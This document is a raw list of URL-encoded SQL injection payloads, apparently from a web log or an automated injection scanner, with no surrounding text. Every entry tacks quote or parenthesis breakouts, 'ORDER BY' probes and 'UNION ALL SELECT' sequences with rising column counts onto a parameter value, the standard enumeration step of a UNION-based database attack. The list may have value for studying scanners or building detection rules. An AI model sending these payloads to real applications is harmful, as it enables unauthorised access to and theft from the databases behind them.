1234.5%29%20WHERE%208434%3D8434%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%207026%3D7026%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%206126%3D6126%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%203772%3D3772%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%203777%3D3777%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%207378%3D7378%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%205790%3D5790%20ORDER%20BY%201%23 1234.5%27%20WHERE%206153%3D6153%20ORDER%20BY%206083%23 1234.5%27%20WHERE%204109%3D4109%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%20WHERE%204172%3D4172%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%27%20WHERE%204292%3D4292%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%203978%3D3978%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%206474%3D6474%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%203108%3D3108%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%203809%3D3809%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%202996%3D2996%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%203373%3D3373%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%203893%3D3893%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%208948%3D8948%20ORDER%20BY%201%23 1234.5%22%20WHERE%207357%3D7357%20ORDER%20BY%209011%23 1234.5%22%20WHERE%201648%3D1648%20UNION%20ALL%20SELECT%20NULL%23 1234.5%22%20WHERE%208566%3D8566%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%22%20WHERE%203761%3D3761%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%209409%3D9409%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%205332%3D5332%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%202268%3D2268%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%203011%3D3011%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%208385%3D8385%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%202119%3D2119%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%206984%3D6984%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%208969%3D8969%20ORDER%20BY%201%23 1234.5%20WHERE%205212%3D5212%20ORDER%20BY%203145%23 1234.5%20WHERE%207931%3D7931%20UNION%20ALL%20SELECT%20NULL%23 1234.5%20WHERE%202226%3D2226%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%20WHERE%202404%3D2404%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%20WHERE%201386%3D1386%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%204107%3D4107%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%209726%3D9726%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%201983%3D1983%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%203538%3D3538%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%209951%3D9951%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%202821%3D2821%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27IYVz%27%20FROM%20DUAL%20WHERE%205196%3D5196%20ORDER%20BY%201%23 1234.5%27%7C%7C%28SELECT%20%27zoPx%27%20FROM%20DUAL%20WHERE%205479%3D5479%20ORDER%20BY%207772%23 1234.5%27%7C%7C%28SELECT%20%27gbkP%27%20FROM%20DUAL%20WHERE%204411%3D4411%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%7C%7C%28SELECT%20%27Tohw%27%20FROM%20DUAL%20WHERE%206545%3D6545%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27BXWd%27%20FROM%20DUAL%20WHERE%202717%3D2717%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27NSKz%27%20FROM%20DUAL%20WHERE%203908%3D3908%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27RZPt%27%20FROM%20DUAL%20WHERE%202383%3D2383%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27kgZY%27%20FROM%20DUAL%20WHERE%208995%3D8995%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27gwra%27%20FROM%20DUAL%20WHERE%207707%3D7707%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27StnP%27%20FROM%20DUAL%20WHERE%209888%3D9888%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27hyZa%27%20FROM%20DUAL%20WHERE%203984%3D3984%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27Kith%27%20FROM%20DUAL%20WHERE%203959%3D3959%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27GRxc%27%20WHERE%204107%3D4107%20ORDER%20BY%201%23 1234.5%27%7C%7C%28SELECT%20%27WbvC%27%20WHERE%208387%3D8387%20ORDER%20BY%203099%23 1234.5%27%7C%7C%28SELECT%20%27jsQh%27%20WHERE%202062%3D2062%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%7C%7C%28SELECT%20%27sUMa%27%20WHERE%206990%3D6990%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27qkix%27%20WHERE%201397%3D1397%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27aWas%27%20WHERE%206985%3D6985%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27IQfL%27%20WHERE%206945%3D6945%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27eRjZ%27%20WHERE%201044%3D1044%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27Dlck%27%20WHERE%208396%3D8396%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27EnhL%27%20WHERE%208570%3D8570%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27mGms%27%20WHERE%208470%3D8470%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27LajM%27%20WHERE%202989%3D2989%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20oomV%20WHERE%204508%3D4508%20ORDER%20BY%201%23 1234.5%27%2B%28SELECT%20IVsy%20WHERE%204912%3D4912%20ORDER%20BY%206023%23 1234.5%27%2B%28SELECT%20FnNl%20WHERE%207036%3D7036%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%2B%28SELECT%20zOuL%20WHERE%205237%3D5237%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%27%2B%28SELECT%20dcgH%20WHERE%206737%3D6737%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20wQkL%20WHERE%203359%3D3359%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20GNfA%20WHERE%205285%3D5285%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20aAdG%20WHERE%207890%3D7890%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20YwKe%20WHERE%202023%3D2023%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20qGmN%20WHERE%203779%3D3779%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20POtC%20WHERE%208437%3D8437%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20zvrd%20WHERE%204111%3D4111%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27WxXK%27%20WHERE%205388%3D5388%20ORDER%20BY%201%23 1234.5%27%2B%28SELECT%20%27VSYB%27%20WHERE%207302%3D7302%20ORDER%20BY%203788%23 1234.5%27%2B%28SELECT%20%27iDDb%27%20WHERE%205245%3D5245%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%2B%28SELECT%20%27uAnv%27%20WHERE%205042%3D5042%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27YVYn%27%20WHERE%205004%3D5004%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27emky%27%20WHERE%209813%3D9813%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27KLne%27%20WHERE%209463%3D9463%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27IHoT%27%20WHERE%204578%3D4578%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27XBOP%27%20WHERE%207565%3D7565%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27hLfM%27%20WHERE%202287%3D2287%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27bVpN%27%20WHERE%203353%3D3353%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27Uubu%27%20WHERE%202485%3D2485%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%209475%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -7164%29%20ORDER%20BY%201%23 -7888%29%20ORDER%20BY%208308%23 -1105%29%20UNION%20ALL%20SELECT%206627%23 -8122%29%20UNION%20ALL%20SELECT%208437%2C8437%23 -7287%29%20UNION%20ALL%20SELECT%209973%2C9973%2C9973%23 -2917%29%20UNION%20ALL%20SELECT%209270%2C9270%2C9270%2C9270%23 -5724%29%20UNION%20ALL%20SELECT%202368%2C2368%2C2368%2C2368%2C2368%23 -4352%29%20UNION%20ALL%20SELECT%201078%2C1078%2C1078%2C1078%2C1078%2C1078%23 -5990%29%20UNION%20ALL%20SELECT%206455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%23 -8739%29%20UNION%20ALL%20SELECT%208142%2C8142%2C8142%2C8142%2C8142%2C8142%2C8142%2C8142%23 -8788%29%20UNION%20ALL%20SELECT%207892%2C7892%2C7892%2C7892%2C7892%2C7892%2C7892%2C7892%2C7892%23 -4256%29%20UNION%20ALL%20SELECT%201608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%2C1608%23 -9216%27%29%20ORDER%20BY%201%23 -7344%27%29%20ORDER%20BY%205049%23 -2928%27%29%20UNION%20ALL%20SELECT%206398%23 -9835%27%29%20UNION%20ALL%20SELECT%204538%2C4538%23 -6201%27%29%20UNION%20ALL%20SELECT%207820%2C7820%2C7820%23 -7008%27%29%20UNION%20ALL%20SELECT%208214%2C8214%2C8214%2C8214%23 -6271%27%29%20UNION%20ALL%20SELECT%206924%2C6924%2C6924%2C6924%2C6924%23 -5409%27%29%20UNION%20ALL%20SELECT%201366%2C1366%2C1366%2C1366%2C1366%2C1366%23 -5379%27%29%20UNION%20ALL%20SELECT%209923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%23 -1386%27%29%20UNION%20ALL%20SELECT%209387%2C9387%2C9387%2C9387%2C9387%2C9387%2C9387%2C9387%23 -1609%27%29%20UNION%20ALL%20SELECT%206361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%23 -9621%27%29%20UNION%20ALL%20SELECT%202388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%2C2388%23 -9942%27%20ORDER%20BY%201%23 -2960%27%20ORDER%20BY%203698%23 -4367%27%20UNION%20ALL%20SELECT%201368%23 -2197%27%20UNION%20ALL%20SELECT%206833%2C6833%23 -9447%27%20UNION%20ALL%20SELECT%201785%2C1785%2C1785%23 -3182%27%20UNION%20ALL%20SELECT%209180%2C9180%2C9180%2C9180%23 -7800%27%20UNION%20ALL%20SELECT%208467%2C8467%2C8467%2C8467%2C8467%23 -5173%27%20UNION%20ALL%20SELECT%204084%2C4084%2C4084%2C4084%2C4084%2C4084%23 -8452%27%20UNION%20ALL%20SELECT%206590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%23 -4330%27%20UNION%20ALL%20SELECT%203118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%23 -2405%27%20UNION%20ALL%20SELECT%206350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%23 -6698%27%20UNION%20ALL%20SELECT%207864%2C7864%2C7864%2C7864%2C7864%2C7864%2C7864%2C7864%2C7864%2C7864%23 -3518%22%20ORDER%20BY%201%23 -9836%22%20ORDER%20BY%204051%23 -3555%22%20UNION%20ALL%20SELECT%209816%23 -7058%22%20UNION%20ALL%20SELECT%209013%2C9013%23 -6939%22%20UNION%20ALL%20SELECT%203388%2C3388%2C3388%23 -5191%22%20UNION%20ALL%20SELECT%203286%2C3286%2C3286%2C3286%23 -9213%22%20UNION%20ALL%20SELECT%203947%2C3947%2C3947%2C3947%2C3947%23 -9950%22%20UNION%20ALL%20SELECT%203889%2C3889%2C3889%2C3889%2C3889%2C3889%23 -4643%22%20UNION%20ALL%20SELECT%204337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%23 -7582%22%20UNION%20ALL%20SELECT%209677%2C9677%2C9677%2C9677%2C9677%2C9677%2C9677%2C9677%23 -6725%22%20UNION%20ALL%20SELECT%205426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%23 -5438%22%20UNION%20ALL%20SELECT%203414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%23 -5864%29%20ORDER%20BY%201%23 -7725%29%20ORDER%20BY%209881%23 -7115%29%20UNION%20ALL%20SELECT%201765%23 -4940%29%20UNION%20ALL%20SELECT%202712%2C2712%23 -8140%29%20UNION%20ALL%20SELECT%205724%2C5724%2C5724%23 -2506%29%20UNION%20ALL%20SELECT%207599%2C7599%2C7599%2C7599%23 -9187%29%20UNION%20ALL%20SELECT%209115%2C9115%2C9115%2C9115%2C9115%23 -3480%29%20UNION%20ALL%20SELECT%208239%2C8239%2C8239%2C8239%2C8239%2C8239%23 -5550%29%20UNION%20ALL%20SELECT%206819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%23 -8683%29%20UNION%20ALL%20SELECT%209470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%2C9470%23 -9644%29%20UNION%20ALL%20SELECT%204886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%23 -1237%29%20UNION%20ALL%20SELECT%209788%2C9788%2C9788%2C9788%2C9788%2C9788%2C9788%2C9788%2C9788%2C9788%23 -6733%29%29%20ORDER%20BY%201%23 -3436%29%29%20ORDER%20BY%205268%23 -1426%29%29%20UNION%20ALL%20SELECT%203232%23 -4108%29%29%20UNION%20ALL%20SELECT%208099%2C8099%23 -2874%29%29%20UNION%20ALL%20SELECT%204219%2C4219%2C4219%23 -4027%29%29%20UNION%20ALL%20SELECT%203744%2C3744%2C3744%2C3744%23 -2623%29%29%20UNION%20ALL%20SELECT%208474%2C8474%2C8474%2C8474%2C8474%23 -4527%29%29%20UNION%20ALL%20SELECT%208578%2C8578%2C8578%2C8578%2C8578%2C8578%23 -4236%29%29%20UNION%20ALL%20SELECT%204219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%23 -3505%29%29%20UNION%20ALL%20SELECT%208414%2C8414%2C8414%2C8414%2C8414%2C8414%2C8414%2C8414%23 -8166%29%29%20UNION%20ALL%20SELECT%201743%2C1743%2C1743%2C1743%2C1743%2C1743%2C1743%2C1743%2C1743%23 -9634%29%29%20UNION%20ALL%20SELECT%206822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%23 -3193%29%29%29%20ORDER%20BY%201%23 -7649%29%29%29%20ORDER%20BY%209620%23 -6400%29%29%29%20UNION%20ALL%20SELECT%204432%23 -3803%29%29%29%20UNION%20ALL%20SELECT%208603%2C8603%23 -9791%29%29%29%20UNION%20ALL%20SELECT%203753%2C3753%2C3753%23 -5286%29%29%29%20UNION%20ALL%20SELECT%203091%2C3091%2C3091%2C3091%23 -6162%29%29%29%20UNION%20ALL%20SELECT%206948%2C6948%2C6948%2C6948%2C6948%23 -3634%29%29%29%20UNION%20ALL%20SELECT%204109%2C4109%2C4109%2C4109%2C4109%2C4109%23 -3796%29%29%29%20UNION%20ALL%20SELECT%205265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%23 -2457%29%29%29%20UNION%20ALL%20SELECT%204412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%23 -8033%29%29%29%20UNION%20ALL%20SELECT%202656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%23 -3851%29%29%29%20UNION%20ALL%20SELECT%204507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%2C4507%23 -1405%20ORDER%20BY%201%23 -8047%20ORDER%20BY%203921%23 -7736%20UNION%20ALL%20SELECT%201089%23 -7917%20UNION%20ALL%20SELECT%205155%2C5155%23 -5924%20UNION%20ALL%20SELECT%207141%2C7141%2C7141%23 -2018%20UNION%20ALL%20SELECT%206697%2C6697%2C6697%2C6697%23 -9661%20UNION%20ALL%20SELECT%204618%2C4618%2C4618%2C4618%2C4618%23 -7857%20UNION%20ALL%20SELECT%203699%2C3699%2C3699%2C3699%2C3699%2C3699%23 -7635%20UNION%20ALL%20SELECT%208610%2C8610%2C8610%2C8610%2C8610%2C8610%2C8610%23 -6586%20UNION%20ALL%20SELECT%201552%2C1552%2C1552%2C1552%2C1552%2C1552%2C1552%2C1552%23 -9048%20UNION%20ALL%20SELECT%206386%2C6386%2C6386%2C6386%2C6386%2C6386%2C6386%2C6386%2C6386%23 -6738%20UNION%20ALL%20SELECT%201163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%23 -9863%27%29%20ORDER%20BY%201%23 -3608%27%29%20ORDER%20BY%204057%23 -5769%27%29%20UNION%20ALL%20SELECT%207289%23 -8711%27%29%20UNION%20ALL%20SELECT%202894%2C2894%23 -6300%27%29%20UNION%20ALL%20SELECT%209379%2C9379%2C9379%23 -8183%27%29%20UNION%20ALL%20SELECT%209658%2C9658%2C9658%2C9658%23 -1061%27%29%20UNION%20ALL%20SELECT%204971%2C4971%2C4971%2C4971%2C4971%23 -5135%27%29%20UNION%20ALL%20SELECT%202982%2C2982%2C2982%2C2982%2C2982%2C2982%23 -4250%27%29%20UNION%20ALL%20SELECT%209987%2C9987%2C9987%2C9987%2C9987%2C9987%2C9987%23 -2065%27%29%20UNION%20ALL%20SELECT%204763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%23 -2238%27%29%20UNION%20ALL%20SELECT%207793%2C7793%2C7793%2C7793%2C7793%2C7793%2C7793%2C7793%2C7793%23 -9342%27%29%20UNION%20ALL%20SELECT%206244%2C6244%2C6244%2C6244%2C6244%2C6244%2C6244%2C6244%2C6244%2C6244%23 -4411%27%29%29%20ORDER%20BY%201%23 -4567%27%29%29%20ORDER%20BY%205512%23 -5824%27%29%29%20UNION%20ALL%20SELECT%206602%23 -2407%27%29%29%20UNION%20ALL%20SELECT%209440%2C9440%23 -6460%27%29%29%20UNION%20ALL%20SELECT%204763%2C4763%2C4763%23 -4058%27%29%29%20UNION%20ALL%20SELECT%208138%2C8138%2C8138%2C8138%23 -8600%27%29%29%20UNION%20ALL%20SELECT%202076%2C2076%2C2076%2C2076%2C2076%23 -9055%27%29%29%20UNION%20ALL%20SELECT%206028%2C6028%2C6028%2C6028%2C6028%2C6028%23 -7903%27%29%29%20UNION%20ALL%20SELECT%201306%2C1306%2C1306%2C1306%2C1306%2C1306%2C1306%23 -6343%27%29%29%20UNION%20ALL%20SELECT%205902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%23 -9925%27%29%29%20UNION%20ALL%20SELECT%205886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%23 -1019%27%29%29%20UNION%20ALL%20SELECT%201111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%23 -7138%27%29%29%29%20ORDER%20BY%201%23 -5194%27%29%29%29%20ORDER%20BY%207858%23 -6528%27%29%29%29%20UNION%20ALL%20SELECT%201730%23 -1091%27%29%29%29%20UNION%20ALL%20SELECT%201795%2C1795%23 -5544%27%29%29%29%20UNION%20ALL%20SELECT%206931%2C6931%2C6931%23 -7340%27%29%29%29%20UNION%20ALL%20SELECT%206329%2C6329%2C6329%2C6329%23 -7705%27%29%29%29%20UNION%20ALL%20SELECT%207457%2C7457%2C7457%2C7457%2C7457%23 -4038%27%29%29%29%20UNION%20ALL%20SELECT%202859%2C2859%2C2859%2C2859%2C2859%2C2859%23 -6300%27%29%29%29%20UNION%20ALL%20SELECT%202971%2C2971%2C2971%2C2971%2C2971%2C2971%2C2971%23 -4209%27%29%29%29%20UNION%20ALL%20SELECT%202047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%2C2047%23 -4586%27%29%29%29%20UNION%20ALL%20SELECT%206609%2C6609%2C6609%2C6609%2C6609%2C6609%2C6609%2C6609%2C6609%23 -1994%27%29%29%29%20UNION%20ALL%20SELECT%204812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%2C4812%23 -2502%27%20ORDER%20BY%201%23 -3101%27%20ORDER%20BY%205916%23 -1417%27%20UNION%20ALL%20SELECT%204902%23 -1919%27%20UNION%20ALL%20SELECT%209996%2C9996%23 -6257%27%20UNION%20ALL%20SELECT%203567%2C3567%2C3567%23 -4428%27%20UNION%20ALL%20SELECT%205314%2C5314%2C5314%2C5314%23 -4558%27%20UNION%20ALL%20SELECT%207725%2C7725%2C7725%2C7725%2C7725%23 -8055%27%20UNION%20ALL%20SELECT%205515%2C5515%2C5515%2C5515%2C5515%2C5515%23 -2597%27%20UNION%20ALL%20SELECT%204903%2C4903%2C4903%2C4903%2C4903%2C4903%2C4903%23 -4291%27%20UNION%20ALL%20SELECT%208590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%23 -6382%27%20UNION%20ALL%20SELECT%204085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%23 -8189%27%20UNION%20ALL%20SELECT%204417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%23 -6303%27%29%20ORDER%20BY%201%23 -9255%27%29%20ORDER%20BY%205154%23 -3074%27%29%20UNION%20ALL%20SELECT%205373%23 -8588%27%29%20UNION%20ALL%20SELECT%203323%2C3323%23 -9978%27%29%20UNION%20ALL%20SELECT%203714%2C3714%2C3714%23 -8355%27%29%20UNION%20ALL%20SELECT%202606%2C2606%2C2606%2C2606%23 -4831%27%29%20UNION%20ALL%20SELECT%205727%2C5727%2C5727%2C5727%2C5727%23 -3616%27%29%20UNION%20ALL%20SELECT%209658%2C9658%2C9658%2C9658%2C9658%2C9658%23 -8668%27%29%20UNION%20ALL%20SELECT%202370%2C2370%2C2370%2C2370%2C2370%2C2370%2C2370%23 -6890%27%29%20UNION%20ALL%20SELECT%207877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%23 -3310%27%29%20UNION%20ALL%20SELECT%203468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%23 